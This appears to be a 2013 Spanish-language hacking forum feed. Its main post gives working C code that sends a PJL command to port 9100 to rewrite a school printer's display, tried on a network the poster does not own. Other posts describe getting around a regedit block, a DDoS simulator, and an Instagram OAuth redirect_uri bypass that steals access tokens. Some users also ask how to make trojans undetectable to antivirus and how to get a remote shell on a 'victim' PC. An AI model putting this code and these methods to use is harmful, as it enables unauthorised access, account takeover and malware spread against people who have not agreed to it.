La Comunidad DragonJAR - Hacking Etico

Hackeando Impresoras

DaXGoN — Wed, 15 May 2013 18:52:14 GMT

Hola muchachos, antes inizio diciendo que no hay muchas imagenes y puede que no sea claro, por eso intentare de explicar bien.
Hoy estaba en la escuela conectado a la red wireless, hice un nmap -T Insane -A 192.168.1.0/24, para ver los equipos que estaban conectados a la red y las puertas abiertas.

Bueno, me aparecio questa IP: 192.168.1.27 con il nombre (Lexmark.. bla bla bla), si es una impresora, con muchos ports abiertos y uno de estos era el 9100.
9100 TCP PDL Data Stream

Buscando buscando y googleando y buscando mas, cai en una pagina donde ensenyaban el PJL (Pritner Job Language), con unos codigos. Estos codigos eran unos comandos que enviados a la impresora habrian hecho algo!
Pense pense y pense, y llegue a la conclusion y me dije:

"Mateo, tu sabes programar en C, haz un programa que te envie ese comando para hacer algo en la impresora no?"

Y me puse a trabajar, el comando que use fue el de cambiar lo que hay escrito en la impresora (en la pantallita).

Llegando a este resultado (Me disculpo por la resolucion pero la hice con el celular y no tenia que verme el profesor)

En italiano "PACCHISSIMO" que se pronuncia "PAKKISSIMO" es una cosa mal hecha o con resultados no buenos.

Ese es el texto ya modificado! A placer obviamente. Ahora les dejo el codigo de mi programita. Pruebenlo y diganme que tal!

C�digo:

//Daxgon

#include 

#include 

#include 

#include 

#include 



#define PORT 9100



int main (int argc, char *argv[]) {



  int sockfd,len,bytes_sent;

  struct hostent *host;

  struct sockaddr_in dest_addr;

  char line[100];

  

  if (argc !=3) {

    printf("\tIl messaggio non puo essere piu lungo di 16 caratteri\n");

    exit(1);

  }



  if ( (host=gethostbyname(argv[1])) == NULL) {

    perror("La funzione gethostbyname ha prodotto un errore");

    exit(1);

  }



  printf ("Stampanti Hack By: Dax\n");

  printf ("Hostname:   %s\n", argv[1]);

  printf ("Messaggio: %s\n",argv[2]);



  dest_addr.sin_family= host->h_addrtype;  

  dest_addr.sin_port= htons(PORT) ;

  bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);



  bzero(&(dest_addr.sin_zero), 8);

  

  printf ("Socket....\n");

  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {

    perror("Errore con il socket");

    exit(1);

  }



  printf ("Connettendo....\n");

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){

    perror("Errore durante la connessione");

    exit(1);}



  //Questo � il codice della stampante

  

  strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");

  strncat(line,argv[2],44);

  strcat(line,"\"\r\n\033%-12345X\r\n");





  printf ("Inviando dati...%d\n",strlen(line));

  printf ("Linea: %s\n",line);

  bytes_sent=send(sockfd,line,strlen(line),0);

  

  printf("Inviati %d bytes\n",bytes_sent);

  close(sockfd);

}

Vi prometto che entro sabado pondre muchas mas imagenes del nmap, asi entenderan mejor!

Si tienen dudas escribanme!

Big Up!

PS. Ahora estoy trabajando en un programa que me controla la impresora desde el computer. Pudiendo manejar todo lo que es posible. Quando este acabado y funcione lo dejare libre

Ah si, los codigos son estos por si no habian entendido.

Ec%-12345X@PJL RDYMSG DISPLAY="MESSAGE"
Ec%-12345X

Para compilar en Linux:

gcc -o nombredelarchivofinal nombredelarchivoenc.c

Y para ejecutar tenes que pasarle 2 argumentos. La IP local de la impresora y el mensaje ES:

./hackdisplay 192.168.1.27 "Este mensaje se vedra en la pantalla"

Les dejo tambien este link que contiene muchos codigos PJL en modo de crear nuevos script.
Si les viene en mente uno no teman a publicarlo!

http://h20000.www2.hp.com/bizsupport...ectID=bpl01965

Acceder al registro de windows aunque el admin bloqueara regedit.exe

Garbage — Wed, 15 May 2013 18:32:18 GMT

En los entornos windows hay muchas formas de hacer la misma cosa y esto dificulta mucho a un administrador el bloquear todas las posibles formas de acceder a un recurso por un usuario, en esta ocasiona nos ponemos en el papel de un pentester que necesita acceder al registro de windows, pero el admin ha tomado la precauci�n de impedir la ejecuci�n del regedit.

lo primero que se nos viene a la mente seria conseguir una copia de regedit de otro equipo, cambiarle el nombre y ejecutarla, pero si esto no funciona, podr�as intentar usar este script en visualbasic script que encontre en el blog de diablohorn que nos permite acceder al registro sin regedit

Cita:

C:\>cscript regview.vbs
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

help

help - displays this help
cd - change to that key
back - go to parent/previous key
ls - list current subkeys
lsv - list current key values
use - root key number to use
0 - HKEY_CLASSES_ROOT
1 - HKEY_CURRENT_USER
2 - HKEY_LOCAL_MACHINE
3 - HKEY_USERS
4 - HKEY_CURRENT_CONFIG

use
key number: 1
[HKEY_CURRENT_USER\] cd software\vmware, inc.
[HKEY_CURRENT_USER\software\vmware, inc.] ls
VMware Tools
[HKEY_CURRENT_USER\software\vmware, inc.] cd vmware tools
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] lsv
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] ls
Hgfs Usability
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] cd hgfs usability
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools\hgfs usability] lsv
Entry Name: mappedDriveLetter
Data Type: String
Value: z
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools\hgfs usability] back
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] back
[HKEY_CURRENT_USER\software\vmware, inc.] exit

descargalo y pruebalo ;-)
https://github.com/DiabloHorn/Diablo...sc/regview.vbs

Kali Linux

Ferbetta — Wed, 15 May 2013 15:44:40 GMT

Hola a toda la comunidad!:
Como soy nuevo en esta comunidad, y estoy aprendiendo poco de a poco...
Les queria proponer una idea general en que podamos aportar entre todos.
La idea es desarrollar videostutoriales del SO Kali Linux, como funcionan los programas y demas, una guia para que todos podamos aprender y sobre todo compartir a otros usuarios que deseen aprender tambien.
Hasta luego!

BoNeSi � The DDoS Botnet Simulator

BladeH — Sat, 11 May 2013 15:36:57 GMT

BoNeSi – The DDoS Botnet Simulator

Los ataques de denegaci�n de servicio est�n a la orden del d�a. Diversos grupos de ciber-criminales los usan para extorsionar a empresas e instituciones entre otros objetivos. Tambi�n se sabe del uso de ataques de denegaci�n de servicio para dejar inoperativos seg�n que servicios en plan de protesta. Hace tiempo vi un software que permit�a simular un ataque de denegaci�n de servicio, de esta manera podremos ver que impacto causar�a en la red. Adem�s permite generar tr�fico del tipo: ICMP, UDP y TCP (HTTP) flooding. Incluso veremos el ataque desde distintas IP’s.

El software es Open Source y lo podemos bajar de aqu�: https://code.google.com/p/bonesi/downloads/list

./configure make y
make install.

Es sencillo de instalar una vez instalado podemos lanzar un ataque y ver como se ver�a en la parte de servidor web. En primer lugar lanzamos bonesi con las opciones m�s b�sicas.

Con Bonesi empezamos a lanzar el ataque sobre el servidor deseado.

Podremos ver que en el servidor destino el consumo de recursos ha aumentado.

Si consultamos los archivos de LOG, o bien capturamos en la interfaz local del servidor atacado podremos ver.

Como simulaci�n este software nos puede ir muy bien.

Aunque no haya realizado las pruebas, Bonesi permite especificar un listado de user-agents para el ataque y de Ip’s distintas de origen.

---->Fuente

BladeH: Aqu� tambi�n le dejo un v�deo donde utilizan esta herramienta para simular un ataque a un servidor y ense�a que se necesita para mitigarlos.

un vistaso a las vulnerabilidades Instagram

BladeH — Wed, 08 May 2013 17:14:14 GMT

�Como hackear las cuenta de instagram?

En este post, voy a mostrar c�mo fui capaz de hackear cuentas de Instagram a trav�s de vulnerabilidades de OAuth (Instagram.com / facebook.com).

Hay b�sicamente dos maneras de tomar ventaja de Instagram OAuth.

Secuestrar cuentas de Instagram Instagram utilizando OAuth (https://instagram.com/oauth/authorize/)
Secuestrar cuentas de Instagram con Facebook OAuth di�logo (https://www.facebook.com/dialog/oauth)

Ataque con �xito nos permiten acceder a:

Fotos privadas
La capacidad de eliminar fotos y editar comentarios
La capacidad de publicar nuevas fotos.

Porque yo me diversi�n con Instagram, "me dije a m� mismo:" Tal vez deber�a comprobar su seguridad? "

As� que cuando Facebook adquirida Instagram, empec� a comprobar a las vulnerabilidades de seguridad, yo les inform� varias vulnerabilidades, incluyendo ataques OAuth, pero la adquisici�n a�n no cerrada y Facebook Seguridad podido poner sus manos sobre los problemas de seguridad, as� que esper�, esper� como WhiteHat,

M�s tarde recib� un mensaje de Facebook de Seguridad, dijeron: Ni siquiera ellos pod�an arreglarlo, todav�a quieren pagar estas vulnerabilidades.

As� que les dije: No hay necesidad de pago, eso es porque no pod�an llevar a cabo controles de seguridad antes de que el cierre de la adquisici�n,

Es incre�ble ver c�mo el equipo de seguridad de Facebook ase un gran trabajo en cuanto a su programa de recompensas de errores, incluso que no cierran la adquisici�n, a�n quieren pagar por estas vulnerabilidades.

Durante la investigaci�n de los par�metros de seguridad de Instagram, me di cuenta de que Facebook Seguridad ha producido algunos resultados impresionantes en cuanto a sus propias vulnerabilidades Instagram OAuth. En esencia, bloquearon el acceso a cualquier y todos los archivos, carpetas y subdominios de validar el par�metro redirect_uri.

Adem�s, la redirecci�n s�lo se le permiti� ir al dominio de aplicaci�n propietario. Eso fue especialmente mala noticia para m�.

Por lo tanto, ten�a que encontrar alguna otra manera de conseguir m�s all� de su protecci�n. Para complicar a�n m�s el problema era el hecho de que usted no puede utilizar una redirecci�n / XSS en la victima propietaria de la aplicasion. Esto se debe a que no tienen acceso a los archivos o carpetas en el dominio de aplicaci�n due�o a trav�s del par�metro redirect_uri.

Por ejemplo:

Permitir solicitud:

https://apigee.com

Bloquear solicitudes:

Redirect_uri = https://www.breaksec.com

Redirect_uri = https://a.apigee.com/

Redirect_uri = https://apigee.com/x/x.php

Redirect_uri = https://apigee.com/ 23%,? o cualquier signo especial

En la actualidad, parece que la redirect_uri es invulnerable a los ataques de OAuth.

Durante la investigaci�n, me encontr� con un bypass furtivo. Si el atacante utiliza un truco sufijo en el dominio de la aplicaci�n propietaria, que pueden pasar por alto el Instagram OAuth y luego enviar el c�digo access_token al propietario del dominio.

Por ejemplo:

Digamos que mi aplicaci�n client_id en Instagram es 33221863xxx y mi dominio es breaksec.com

En este caso, el par�metro redirect_uri debe permitir redirecci�n s�lo para mi dominio (breaksec.com), �no? �Qu� sucede cuando se cambia el sufijo de dominio a algo as� como:

Breaksec.com.mx

En este ejemplo, el atacante puede enviar el access_token, el c�digo directamente a breaksec.com.mx. Para que el ataque tenga �xito, por supuesto, el atacante tendr� que comprar el nuevo dominio (en este caso, breaksec.com.mx).

Tambi�n es posible comprar otros dominios breaksec.com como:

com.tw

com.mx

com.es

com.co

com.bz

com.br

com.ag

Bypass PoC (fijado por Facebook Security Team):

Game Over.

Bug 2.

Con este error, he usado el valor client_id Instagram a trav�s del Facebook OAuth (https://www.facebook.com/dialog/oauth).

Cuando se utiliza la aplicaci�n Instagram, que se puede integrar con Facebook.

Por ejemplo:

Cuando un usuario quiere subir sus fotos Instagram a Facebook, permiten esta interacci�n e integraci�n se lleven a cabo.

Para mi sorpresa, descubr� que un atacante puede utilizar pr�cticamente en cualquier dominio del redirect_uri, par�metro siguiente. Este fue en realidad una especie de desconcertante y no s� por qu� sucedi� esto, pero funcion�. Usted, literalmente, puede utilizar cualquier dominio redirect_uri, proximo par�metro a trav�s del redirect_uri en Instagram client_id.

Esto efectivamente permite al atacante robar el access_token de cualquier usuario de Instagram,

Con el access_token el atacante ser� capaz de publicar en el nombre v�ctima en su cuenta de Facebook, Acceso a su lista de amigos privada.

PoC (Facebook ya fija este n�mero):

https://www.facebook.com/connect/uis...nse_type=token

PoC v�deo:

�Hasta la pr�xima ;)

Por @ Nirgoldshlager

------>Fuente breaksec.com

ayuda sobre de como hacer indetectable los troyanos

wildervv — Sun, 28 Apr 2013 21:24:24 GMT

hace mucho tiempo utilizaba backdoors como bifrost, poison yvy... ETC; el problema era que tardaba mucho tiempo buscando crypters modificados, que en su mayor�a de veces no funcionaban o te inyectaban alg�n otro troyano:mad:.
mi pregunta es: hay alg�n tutorial que me explique muy bien como realizar o modificar un crypter para hacer indetectables mis server.exe ante los antivirus?
me gustar�a mucho aprender sobre esto:confused::confused:.

tengo conocimientos de varios lenguajes de programaci�n, as� que este no seria una dificultad para mi.

de ante mano gracias.

Alguien sabe como crear troyanos?

Dilan — Sun, 28 Apr 2013 19:04:44 GMT

Me gustar�a saber si hay alg�n tutorial o alguna gu�a para crear troyanos para poder ver la informaci�n de otra computadora.

Buscando vulnerabilidad por nmap

Audioslave — Sun, 21 Apr 2013 11:57:42 GMT

Saludos, soy nuevo en este foro.
He estado buscando la manera de como conseguir una shellremota, hasta ahora solo estoy probando buscando vulnerabilidades en la pc "victima". Investigue buscando vulnerabilidad con nmap en el servicio smb en mi red Lan y estos fueron los resultados:

ImageShack� - Online Photo and Video Hosting

Investigue tambien sobre esas vulnerabilidades que busca el nmap y me di cuenta que son antiguas y pense que ya no estan disponibles por los parches actualizados pero despues probe en otra LAN:

ImageShack� - Online Photo and Video Hosting

El resultado "Likely INFECTED" quiere decir que podria tener acceso a esa pc mediante esa vulnerabilidad en el servicio SMB ?
Estuve investigando en google pero nada encontre, todo en ingles y solo lei que era posible que sea solo un virus.
Espero aportes y seguir� investigando.